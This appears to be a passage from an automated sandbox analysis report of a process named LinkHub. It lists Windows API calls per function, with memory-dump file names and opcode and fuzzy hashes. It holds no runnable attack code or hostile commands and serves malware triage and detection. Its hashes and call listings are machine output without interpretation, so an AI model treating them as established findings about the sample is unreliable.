                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: 755fd46f587bee793129bc4a4f3a8ea00877a2cd8ca32c00d859323d22d5402f
                                                                    • Instruction ID: 517b208af65892abf729a14aa75dd52a097525c995765b3c71a998d6bc503f67
                                                                    • Opcode Fuzzy Hash: 755fd46f587bee793129bc4a4f3a8ea00877a2cd8ca32c00d859323d22d5402f
                                                                    • Instruction Fuzzy Hash: 57313630B15252AFDB21CF48EC98FA537A5FB8A710F1441A6F540CB2B1CBB1AD64DB42
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002A80D0
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002A80F6
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 002A80F9
                                                                    • SysAllocString.OLEAUT32(?), ref: 002A8117
                                                                    • SysFreeString.OLEAUT32(?), ref: 002A8120
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 002A8145
                                                                    • SysAllocString.OLEAUT32(?), ref: 002A8153
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 5b3f20bf36c4c533bd872462df6fcac6aafc7f321368ca440164a43c0ba252e6
                                                                    • Instruction ID: 65489c74106fcea6ff7228e155308278712eba8e698e452769e0fc650f23206d
                                                                    • Opcode Fuzzy Hash: 5b3f20bf36c4c533bd872462df6fcac6aafc7f321368ca440164a43c0ba252e6
                                                                    • Instruction Fuzzy Hash: DC21A776611219AFDF10DFA8DC88CBB73ECEB0A3607048425F909DB290DE70EC468760
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002A81A9
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002A81CF
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 002A81D2
                                                                    • SysAllocString.OLEAUT32 ref: 002A81F3
                                                                    • SysFreeString.OLEAUT32 ref: 002A81FC
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 002A8216
                                                                    • SysAllocString.OLEAUT32(?), ref: 002A8224
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 6219acf47db61bf75a40d4f37b6a1da2f465a184d244533e753856bb9de25d4e
                                                                    • Instruction ID: dc292a361eec77a47e1cd894468fc161eb1cf310ebbedbace61e9a98240a04dd
                                                                    • Opcode Fuzzy Hash: 6219acf47db61bf75a40d4f37b6a1da2f465a184d244533e753856bb9de25d4e
                                                                    • Instruction Fuzzy Hash: 9A217475611545BF9B109FA8EC89DBA77ECFB4A3607048125F905CB1A0EE70EC51CB64
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 002B0E99
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B0ED5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
                                                                    • Opcode ID: 40874fcc3bf20bf48cd4103398be65be411dd31191c5ac8dff5debc80ee05e10
                                                                    • Instruction ID: 49ee2796b4276998558a15c23f3cbdac3d34bee2bf796984919ad0c8d1f086d8
                                                                    • Opcode Fuzzy Hash: 40874fcc3bf20bf48cd4103398be65be411dd31191c5ac8dff5debc80ee05e10
                                                                    • Instruction Fuzzy Hash: 25217374A10306ABDB218F24D888AEB77A8BF55360F244919FCA5D71D0DB70DC60CB50
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 002B0F6D
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B0FA8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
                                                                    • Opcode ID: 1acbf7c2d443be2f627cfceca9a9e18ef6e897192a5829c29f08da769dfbedc2
                                                                    • Instruction ID: 1cf88e04972a838c44f9198d0c6f81231c774d2162d7d23085722a4b3a494c7c
                                                                    • Opcode Fuzzy Hash: 1acbf7c2d443be2f627cfceca9a9e18ef6e897192a5829c29f08da769dfbedc2
                                                                    • Instruction Fuzzy Hash: FB2183756103469BDB309F689C48BDA77A8BF557A0F200A19FCA1D32D0DB709CB0DB50
                                                                    APIs
                                                                      • Part of subcall function 00247873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002478B1
                                                                      • Part of subcall function 00247873: GetStockObject.GDI32(00000011), ref: 002478C5
                                                                      • Part of subcall function 00247873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002478CF
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002D4BB0
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002D4BBD
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002D4BC8
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002D4BD7
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002D4BE3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: 1a5fe9fc7d14333191b4ce01b618bfb7ffd1a120020441498a27e414eb634751
                                                                    • Instruction ID: 9002feaf1999acadd3cf973db54827bf048226405f455aa5cb848fbfb10836db
                                                                    • Opcode Fuzzy Hash: 1a5fe9fc7d14333191b4ce01b618bfb7ffd1a120020441498a27e414eb634751
                                                                    • Instruction Fuzzy Hash: 6A1193B155021ABEEF119F64CC85EEB7F6DEF08758F014112F618A2190CB72DC21DBA4
                                                                    APIs
                                                                      • Part of subcall function 0027DB23: _free.LIBCMT ref: 0027DB4C
                                                                    • _free.LIBCMT ref: 0027DBAD
                                                                      • Part of subcall function 00272D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0027DB51,?,00000000,?,00000000,?,0027DB78,?,00000007,?,?,0027DF75,?), ref: 00272D4E
                                                                      • Part of subcall function 00272D38: GetLastError.KERNEL32(?,?,0027DB51,?,00000000,?,00000000,?,0027DB78,?,00000007,?,?,0027DF75,?,?), ref: 00272D60
                                                                    • _free.LIBCMT ref: 0027DBB8
                                                                    • _free.LIBCMT ref: 0027DBC3
                                                                    • _free.LIBCMT ref: 0027DC17
                                                                    • _free.LIBCMT ref: 0027DC22
                                                                    • _free.LIBCMT ref: 0027DC2D
                                                                    • _free.LIBCMT ref: 0027DC38
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                    • Instruction ID: cfff63c26261d21db7a8279e745777d71796dee8462ee56162caf8f14640a7d9
                                                                    • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                    • Instruction Fuzzy Hash: E6114C72561B04EAD630BBB0CC07FCB77ECAF04700F418C19B29DAA252DA75B5288E50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID: j`*
                                                                    • API String ID: 2931989736-71775637
                                                                    • Opcode ID: 9480722d1ad1b0d17188f5c1f6261774713f2be02ddbf384e84a8684ca58c57e
                                                                    • Instruction ID: f9730c4510510df76184006cc47a8ab5ccf9a0d201b8643b2f3117dd60537594
                                                                    • Opcode Fuzzy Hash: 9480722d1ad1b0d17188f5c1f6261774713f2be02ddbf384e84a8684ca58c57e
                                                                    • Instruction Fuzzy Hash: 7101F5E26703467BD3105A215C86FABB31DFE2239DB080425FD099A241EBA1FDF1C6A0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002AE328
                                                                    • LoadStringW.USER32(00000000), ref: 002AE32F
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002AE345
                                                                    • LoadStringW.USER32(00000000), ref: 002AE34C
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002AE390
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 002AE36D
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 4072794657-3128320259
                                                                    • Opcode ID: c9bba107df3a893af6bff1b8680dd78a16ebd9cc9803205f9a24d2595b878d9a
                                                                    • Instruction ID: 7e29206ef722a05e753997136844baa0591a0627f2ad651a8e33a3a2abc5c8cf
                                                                    • Opcode Fuzzy Hash: c9bba107df3a893af6bff1b8680dd78a16ebd9cc9803205f9a24d2595b878d9a
                                                                    • Instruction Fuzzy Hash: 000186F2D102087FEB119BA4AD8DEFB776CDB08300F414592B709E6041EA74DE848BB5
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 002B1322
                                                                    • EnterCriticalSection.KERNEL32(00000000,?), ref: 002B1334
                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 002B1342
                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 002B1350
                                                                    • CloseHandle.KERNEL32(00000000), ref: 002B135F
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 002B136F
                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 002B1376
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: e5833a50627c25dbba0fed639e5966b57fcef198d32141d7600e84f765130f26
                                                                    • Instruction ID: 34843e17451dc5e72f9a3d7c25f6763b5a2b5ce758df6c9fa855162435205850
                                                                    • Opcode Fuzzy Hash: e5833a50627c25dbba0fed639e5966b57fcef198d32141d7600e84f765130f26
                                                                    • Instruction Fuzzy Hash: 4AF0C936443A52ABD7411F54EE4DBD6BB79FF05342F801162F101918A197749871CF90
                                                                    APIs
                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002C281D
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002C283E
                                                                    • WSAGetLastError.WSOCK32 ref: 002C284F
                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 002C2938
                                                                    • inet_ntoa.WSOCK32(?), ref: 002C28E9
                                                                      • Part of subcall function 002A433E: _strlen.LIBCMT ref: 002A4348
                                                                      • Part of subcall function 002C3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,002BF669), ref: 002C3C9D
                                                                    • _strlen.LIBCMT ref: 002C2992
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 3203458085-0
                                                                    • Opcode ID: e2d44b28b8cd32a99dfd41bd4c6075dd83347cc91857159567b06f072e0ab92e
                                                                    • Instruction ID: a4aa65cbef6a4492599226487b967c0952da09d102b8555f94ffd94bb91a630f
                                                                    • Opcode Fuzzy Hash: e2d44b28b8cd32a99dfd41bd4c6075dd83347cc91857159567b06f072e0ab92e
                                                                    • Instruction Fuzzy Hash: 97B1E235614301EFD324DF24C885F2AB7A5AF88318F64864CF45A4B2A2DF71ED5ACB91
                                                                    APIs
                                                                    • __allrem.LIBCMT ref: 0027042A
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00270446
                                                                    • __allrem.LIBCMT ref: 0027045D
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0027047B
                                                                    • __allrem.LIBCMT ref: 00270492
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002704B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1992179935-0
                                                                    • Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                    • Instruction ID: 2c7b982315272b89c6b2864d1ead061014683b053d56cd37f39ff8e6cfc8de21
                                                                    • Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                    • Instruction Fuzzy Hash: BA81FB72A20706DBE720AF79CCD1B6A73E9AF44324F24C12AF519D7681E770DD288B54
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00268649,00268649,?,?,?,002767C2,00000001,00000001,8BE85006), ref: 002765CB
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002767C2,00000001,00000001,8BE85006,?,?,?), ref: 00276651
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0027674B
                                                                    • __freea.LIBCMT ref: 00276758
                                                                      • Part of subcall function 00273B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00260165,?,?,002B11D9,0000FFFF), ref: 00273BC5
                                                                    • __freea.LIBCMT ref: 00276761
                                                                    • __freea.LIBCMT ref: 00276786
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: 20d864766c53554a047d7756427f9c7862417749c5bd627c4240bd75e6d95925
                                                                    • Instruction ID: d17fd9c5b1ac4baa8d019c81459bcd522c73b9add8ddbe031b5cf235f87afd58
                                                                    • Opcode Fuzzy Hash: 20d864766c53554a047d7756427f9c7862417749c5bd627c4240bd75e6d95925
                                                                    • Instruction Fuzzy Hash: E6511872630517AFEB298F64CC89EBBB7A9EB40754F148269FC0CD6140EB35DC60D660
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CC10E,?,?), ref: 002CD415
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD451
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD4C8
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002CC72A
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002CC785
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002CC7CA
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002CC7F9
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002CC853
                                                                    • RegCloseKey.ADVAPI32(?), ref: 002CC85F
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                    • String ID:
                                                                    • API String ID: 1120388591-0
                                                                    • Opcode ID: c49da641c837eebab335fd4471d53c4925225293a83867973c606714aaa40d2a
                                                                    • Instruction ID: e74499ef75c9c32f303a294850f82b202969d77b6fe7588844a6ffbb1bd8a626
                                                                    • Opcode Fuzzy Hash: c49da641c837eebab335fd4471d53c4925225293a83867973c606714aaa40d2a
                                                                    • Instruction Fuzzy Hash: 78816B30528241AFC715DF24C885E2ABBE9FF84308F14869DF4598B2A2CB31ED59CF91
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000035), ref: 002A00A9
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 002A0150
                                                                    • VariantCopy.OLEAUT32(002A0354,00000000), ref: 002A0179
                                                                    • VariantClear.OLEAUT32(002A0354), ref: 002A019D
                                                                    • VariantCopy.OLEAUT32(002A0354,00000000), ref: 002A01A1
                                                                    • VariantClear.OLEAUT32(?), ref: 002A01AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                    • String ID:
                                                                    • API String ID: 3859894641-0
                                                                    • Opcode ID: 35c8bca9a3ba46a265dd6fb7a54737c07f4550cc93d96ee466ac9eef77b8486e
                                                                    • Instruction ID: a5fd15b891ef7027b2cf6ba0db2e0d31a47d4db7470861295592b77fe105a109
                                                                    • Opcode Fuzzy Hash: 35c8bca9a3ba46a265dd6fb7a54737c07f4550cc93d96ee466ac9eef77b8486e
                                                                    • Instruction Fuzzy Hash: EB51B635A70311ABCF14AF6498C9B69B3A5AF47310B248447EC06DF296DEB09C64CB56
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 002B6F21
                                                                    • CoInitialize.OLE32(00000000), ref: 002B707E
